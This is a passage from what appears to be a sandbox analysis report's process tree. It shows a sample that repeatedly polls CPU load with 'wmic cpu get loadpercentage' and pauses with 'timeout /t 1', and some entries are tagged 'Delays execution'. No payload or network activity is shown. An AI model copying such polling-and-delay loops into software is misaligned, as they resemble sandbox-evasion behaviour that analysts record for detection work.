    PID:1288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3548
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4076
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3536
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4464
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2824
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:60
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4324
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4764
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1612
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2092
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1616
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3864
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2400
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:560
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:64
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2836
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4496
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2588
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2288
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3680
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4920
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2132
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2864
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4308
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1976
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3868
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4388
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4184
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2996
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4224
